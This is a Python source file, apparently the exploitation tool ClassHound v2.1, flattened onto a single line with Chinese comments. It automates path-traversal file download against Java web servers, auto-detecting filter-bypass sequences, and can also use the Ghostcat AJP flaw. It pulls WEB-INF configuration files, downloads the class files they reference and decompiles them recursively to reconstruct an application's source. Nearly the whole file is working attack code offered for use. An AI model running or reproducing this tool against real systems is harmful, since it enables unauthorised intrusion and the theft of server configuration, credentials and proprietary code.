#!/usr/bin/env python # coding: utf-8 # Build By LandGrey import io import re import time import urllib3 import requests import argparse import subprocess from thirdparty.lib import * from thirdparty.ghostcat import * from bs4 import BeautifulSoup from requests.adapters import HTTPAdapter try: from urllib import quote reload(sys) sys.setdefaultencoding('utf8') except ImportError: from urllib.request import quote finally: urllib3.disable_warnings() session = requests.Session() session.mount('http://', HTTPAdapter(max_retries=2)) session.mount('https://', HTTPAdapter(max_retries=2)) def change_travel_path(travel_file_path): global url, post_data _data = travel_char * travel_char_count + travel_file_path raw_file_path = delimiter + normal_path + delimiter if raw_post_data: post_data = raw_post_data.replace(raw_file_path, _data) else: url = raw_url.replace(raw_file_path, _data) def request(): if sleep_time > 0: time.sleep(sleep_time) try: if not post_data: r = session.get(url, headers=headers, verify=False, timeout=15, allow_redirects=True) else: r = session.post(url, headers=headers, data=post_data, verify=False, timeout=15, allow_redirects=True) return r.status_code, r.content except requests.exceptions.ConnectionError as e: print("[-] Request ConnectionError!") def download_and_save(travel_file_path, auto_change_count=False): global travel_char_count travel_file_path = travel_file_path.lstrip('/') pre_count = travel_char_count success = False if use_vulnerability == "ghostcat": success = True _content = exploit_ajp(url, ajp_port, travel_file_path, method='GET' if not post_data else 'POST', headers=headers) if keyword not in str(_content): sys.stdout.write('\r[+] Download [{}] ok !'.format(travel_file_path)) save_file(workspace, travel_file_path, _content) else: sys.stdout.write('\r[-] Download [{}] failed'.format(travel_file_path)) sys.stdout.flush() else: change_travel_path(travel_file_path) _status_code, _content = request() if _content and _status_code == normal_status_code and keyword not in str(_content): try: save_file(workspace, travel_file_path, _content) sys.stdout.write('\r[+] Download [{}] ok{}'.format(travel_file_path, ' ' * 10)) success = True travel_char_count = pre_count except Exception as e: sys.stdout.write('\r[-] Download [{}] failed'.format(travel_file_path)) else: sys.stdout.write('\r[-] Download [{}] failed'.format(travel_file_path)) sys.stdout.flush() # 没下载成功并使用 --auto 时 if auto_change_count and not success: ranges = range(1, max_count) ranges.remove(travel_char_count) for r in ranges: travel_char_count = r change_travel_path(travel_file_path) _status_code, _content = request() if _content and _status_code == normal_status_code and keyword not in str(_content): try: save_file(workspace, travel_file_path, _content) sys.stdout.write('\r[+] Download [{}] ok !'.format(travel_file_path)) travel_char_count = r break except Exception as e: sys.stdout.write('\r[-] Download [{}] failed !'.format(travel_file_path)) else: sys.stdout.write('\r[-] Download [{}] failed !'.format(travel_file_path)) sys.stdout.flush() def disk_path_to_url_dir_path(disk_path): """ :param disk_path: :return: /WEB-INF/config', '/WEB-INF/config/cache-context.xml """ url_path = os.path.abspath(disk_path)[len(os.path.abspath(workspace)):].replace('\\', '/') url_dir = os.path.split(url_path)[0] return url_dir, url_path def parse_xml_get_xml_url(xml_path): with io.open(xml_path, 'r', encoding="utf-8") as f: content = f.read() soup = BeautifulSoup(content, 'html.parser') values = [] xml_urls = [] # 解析全局 context-param 中 xml 文件路径 for param in soup.find_all('context-param'): for child in param.find_all('param-value'): values.extend(file_path_extract(child.text)) # 解析 servlet 中 xml 文件路径 for servlet in soup.find_all('servlet'): servlet_name = servlet.find('servlet-name') for servlet_param in servlet.find_all('init-param'): param_value = servlet_param.find('param-value') if not param_value: xml_urls.append(base_path + 'WEB-INF/{}-servlet.xml'.format(servlet_name)) xml_urls.append(base_path + 'WEB-INF/classes/{}-servlet.xml'.format(servlet_name)) else: values.extend(file_path_extract(param_value.text)) # 模糊正则匹配其他情况 matches = re.findall('(.*?)', content) if matches: for m in matches: values.extend(file_path_extract(m)) for value in values: if not value.strip() or "*" in value: continue if "WEB-INF/" in value.upper(): xml_urls.append(value.strip().lstrip('/')) else: if "classes/" in value.lower(): xml_urls.append("WEB-INF/" + value.strip().lstrip('/')) else: xml_urls.append("WEB-INF/classes/" + value.strip().lstrip('/')) xml_urls = list(set(xml_urls)) return xml_urls def match_and_download_xml(path): xml_urls = parse_xml_get_xml_url(path) for xml_url in xml_urls: for extension in do_download_extensions_from_xml: if xml_url.endswith(extension): download_and_save(xml_url) break def decompile_and_download_class(class_path): command = ['java', '-jar', '{}'.format(os.path.join(current_folder, 'thirdparty', 'cfr-0.145.jar')), class_path] process = subprocess.Popen(command, stdout=subprocess.PIPE, stderr=subprocess.PIPE) stdout, stderr = process.communicate() # 保存反编译的 class 文件 relative_java_path = class_path.replace(workspace, '').replace('classes', 'java').replace('.class', '.java').lstrip('/') save_file(workspace, relative_java_path, stdout) match = re.findall('import (.*?);', stdout.decode('utf-8'), re.I | re.M | re.S) if match: for m in match: _class_url_path = base_path + 'WEB-INF/classes/' + m.strip().replace(".", "/") + '.class' _allow_download = True for x in do_not_download_classes: if x in _class_url_path: _allow_download = False if _allow_download and _class_url_path not in already_download_class_url_list: download_and_save(_class_url_path) already_download_class_url_list.append(_class_url_path) if __name__ == '__main__': start_time = time.time() print(''' _ _ | ,,,,, o' \,=./ `o |.===. /(o o)\ (o o) {}o o{} ooO--(_)--OooooO--(_)--OooooO--(_)--Ooo ClassHound v2.1\n ''') try: current_folder = os.path.dirname(os.path.join(os.path.abspath(sys.argv[0]))).encode('utf-8').decode() except UnicodeError as e: try: current_folder = os.path.dirname(os.path.abspath(sys.argv[0])).decode('utf-8') except UnicodeError as e: current_folder = "." exit('[*] Please play script in ascii string path') # arguments init parser = argparse.ArgumentParser() parser.add_argument('-u', '--url', dest='raw_url', default='', help='Full download url, file path must surrounded with delimiter char.\nSuch as:') parser.add_argument('-k', '--keyword', dest='keyword', default=None, help='404 page keyword') parser.add_argument('-p', '--post', dest='raw_post_data', default='', help='POST data, file path must surrounded with delimiter char') parser.add_argument('-f', '--file', dest='url_file', default='', help='specify need download file url path list') parser.add_argument('-a', '--auto', dest='auto_change', default=False, action='store_true', help='auto detect and change travel char count when use -f options') parser.add_argument('-s', '--sleep-time', dest='sleep_time', default=0, type=float, help='sleep_time some seconds between two requests') parser.add_argument('-bp', '--base-path', dest='base_path', default='/', help='/WEB-INF folder prefix web path, default: "/".\nSuch as: change it to "opt/tomcat/webapps/"') parser.add_argument('-tc', '--travel-char', dest='travel_char', default='', help='specify travel char like ../') parser.add_argument('-cc', '--char-count', dest='travel_char_count', default=-1, type=int, help='travel char count number') parser.add_argument('-dc', '--delimiter-char', dest='delimiter_char', default='#', help='Delimiter char that surround file path , default: #') parser.add_argument('-hh', '--http-header', dest='http_header', default='', help='Add http request header, format: "Referer:,admin:true"') parser.add_argument('-hp', '--http-proxy', dest='http_proxy', default=None, help='set http/https proxy') parser.add_argument('-mc', '--max-count', dest='max_count', default=8, type=int, help='max try travel char count, default: 10') parser.add_argument('-vul', '--vulnerability', dest='vulnerability', choices=['ghostcat'], default='', help='use other vulnerability to download file.\nSuch as: ghostcat') parser.add_argument('--ajp-port', dest='ajp_port', default=8009, type=int, help='ghostcat vulnerability ajp port, default: 8009') if len(sys.argv) == 1: sys.argv.append('-h') args = parser.parse_args() raw_url = args.raw_url keyword = args.keyword auto = args.auto_change sleep_time = args.sleep_time max_count = args.max_count http_proxy = args.http_proxy download_path = args.url_file base_path = args.base_path travel_char = args.travel_char http_header = args.http_header delimiter = args.delimiter_char raw_post_data = args.raw_post_data travel_char_count = args.travel_char_count use_vulnerability = args.vulnerability ajp_port = args.ajp_port # variable declare url = raw_url post_data = raw_post_data init_travel_files_with_prefix = [] already_append_xml_disk_path_list = [] not_parsed_disk_xml_path_list = [] already_download_class_url_list = [] already_download_class_disk_path_list = [] not_decompile_disk_class_path_list = [] workspace = get_workspace(raw_url) session.proxies = {'http': http_proxy, 'https': http_proxy} headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0', 'Connection': 'Keep-Alive', 'Content-Type': 'application/x-www-form-urlencoded', } # 设置额外 HTTP headers if http_header: for header in http_header.split(","): header = header.strip() if header: kv = header.split(":") headers.update({kv[0].strip(): kv[-1].strip()}) for x in init_travel_files_without_prefix: init_travel_files_with_prefix.append((base_path if base_path != "/" else "") + x) try: if raw_post_data: normal_path = re.findall(delimiter + '(.*?)' + delimiter, post_data)[0] post_data = raw_post_data.replace(delimiter, '') else: normal_path = re.findall(delimiter + '(.*?)' + delimiter, raw_url)[0] url = raw_url.replace(delimiter, '') if len(normal_path) == 0: exit('Invalid delimiter char {}, please changed!'.format(delimiter)) except IndexError: normal_path = "fake path" if not use_vulnerability: exit('Cannot match valid file path in the middle of "{0} {0}"'.format(delimiter)) if use_vulnerability == 'ghostcat': if keyword is None: try: keyword = str(exploit_ajp(url, ajp_port, get_random_string(suffix=".jsp"), method='GET' if not post_data else 'POST', headers=headers)) except Exception as e: keyword = "page not found" for _tf in init_travel_files_without_prefix: _xml_content = exploit_ajp(url, ajp_port, _tf, method='GET' if not post_data else 'POST', headers=headers) if keyword not in str(_xml_content): save_file(workspace, _tf, _xml_content) sys.stdout.write('\r[+] Download [{}] ok !'.format(_tf)) sys.stdout.flush() else: if keyword is None: keyword = "page not found" # 获得正常下载请求的状态码和内容 normal_status_code, normal_content = request() # 没指定遍历字符时自动探测遍历字符 if not travel_char: travel_char = '../' # 正常文件名倒数第二位插入 ./ 探测目标是否会替换 ./ 为空字符 change_travel_path(normal_path[:-1] + './' + normal_path[-1]) char_status_code, char_content = request() # 被替换 if char_status_code == normal_status_code and char_content == normal_content: travel_char = '...//' # 正常文件名倒数第二位插入 ../ 探测目标是否会替换 ../ 为空字符 change_travel_path(normal_path[:-1] + '../' + normal_path[-1]) char_status_code, char_content = request() # 被替换 if char_status_code == normal_status_code and char_content == normal_content: travel_char = '.....///' else: # 正常文件名倒数第二位插入 ../ 探测目标是否会替换 ../ 为空字符 change_travel_path(normal_path[:-1] + '../' + normal_path[-1]) char_status_code, char_content = request() # 被替换 if char_status_code == normal_status_code and char_content == normal_content: travel_char = '....//' # 首先尝试下载内置的配置文件列表 for _tf in init_travel_files_with_prefix: # 手动指定遍历字符数量不再自动探测 if travel_char_count != -1: change_travel_path(travel_char * travel_char_count + _tf) try_status_code, try_content = request() if try_content and try_status_code == normal_status_code and keyword not in str(try_content): save_file(workspace, _tf, try_content) print('\r[+] Travel Char: [{}] Count: [{}]. Success download: [{}]'.format(travel_char, travel_char_count, _tf)) else: for x in range(1, max_count + 1): change_travel_path(travel_char * x + _tf) try_status_code, try_content = request() if try_content and try_status_code == normal_status_code and keyword not in str(try_content): travel_char_count = x if travel_char_count == 0 else travel_char_count save_file(workspace, _tf, try_content) print('\r[+] Travel Char: [{}] Count: [{}]. Success download: [{}]'.format(travel_char, travel_char_count, _tf)) break try: # 指定了额外的下载文件列表 if download_path: print("[+] Download from [{}] file ...".format(download_path)) if os.path.isfile(download_path): with io.open(download_path, 'r', encoding="utf-8") as f: for line in f.readlines(): if line.strip(): download_and_save(line.strip(), auto_change_count=True) else: exit("[-] File [{}] not exists".format(download_path)) else: print("\r[+] Download [*.xml] files by prepared files list ...") # 循环解析下载 xml 文件 continue_xml_parse_and_download = True while True and continue_xml_parse_and_download: for fp in walk_file_paths(workspace): # 首先更新未解析 xml 路径列表 if fp in not_parsed_disk_xml_path_list: not_parsed_disk_xml_path_list.remove(fp) # 解析从未解析过的 xml 文件 if fp.endswith('.xml') and fp not in already_append_xml_disk_path_list: match_and_download_xml(fp) # 历史已解析 xml 列表 already_append_xml_disk_path_list.append(fp) # 剩下的未解析 xml 列表 not_parsed_disk_xml_path_list.append(fp) # 如果本地 xml 文件全部都被解析过则退出循环 if not not_parsed_disk_xml_path_list: continue_xml_parse_and_download = False print("\r[+] Download [*.class] files parsing from [*.xml] files ...") # 粗粒度提取 xml 文件中 class 地址并尝试下载到本地 class_pattern = '<.*?class>(.*?)|class="(.*?)"|classname="(.*?)"|type="(.*?)"|resource="(.*?)"' for fp in walk_file_paths(workspace): if fp.endswith('.xml'): try: m = re.findall(class_pattern, io.open(fp, 'r', encoding="utf-8").read(), re.I | re.M | re.S) except Exception as e: m = re.findall(class_pattern, io.open(fp, 'r').read(), re.I | re.M | re.S) if m: for _m in m: match_m = _m[0] for x in range(0, len(_m)): if _m[x]: match_m = _m[x] break class_path_uri = match_m.replace(".", "/").strip() class_url_path = base_path + 'WEB-INF/classes/' + class_path_uri + '.class' allow_download = True for x in do_not_download_classes: if ('/' + class_path_uri).startswith(x): allow_download = False if allow_download and class_url_path not in already_download_class_url_list: download_and_save(class_url_path) already_download_class_url_list.append(class_url_path) print("\r[+] Download [*.class] files by decompiled [*.class] files ...") # 循环反编译 class 文件并下载到本地 continue_class_parse_and_download = True while True and continue_class_parse_and_download: for fp in walk_file_paths(workspace): if fp in not_decompile_disk_class_path_list: not_decompile_disk_class_path_list.remove(fp) if fp.endswith('.class') and fp not in already_download_class_disk_path_list: decompile_and_download_class(fp) already_download_class_disk_path_list.append(fp) not_decompile_disk_class_path_list.append(fp) # 如果本地 xml 文件全部都被解析过则退出循环 if not not_decompile_disk_class_path_list: continue_class_parse_and_download = False except KeyboardInterrupt: print("\n[*] User press CTR+C !") # 统计下最终下载的文件类型和数量 fs = {} description = "" for fp in walk_file_paths(workspace): fn = os.path.split(fp)[-1] if len(fn.split(".")) == 2: if fn.split(".")[-1]: if fn.split(".")[-1] in fs.keys(): fs[fn.split(".")[-1]] += 1 else: fs[fn.split(".")[-1]] = 1 else: if 'other' in fs.keys(): fs['other'] += 1 else: fs['other'] = 1 for k, v in fs.items(): description += "\n[+] Download {:10} files : {}".format(k, v) print("\n\r[+] All cost {:10} seconds{}\n[+] result in: {}".format(str(time.time() - start_time)[:6], description, workspace))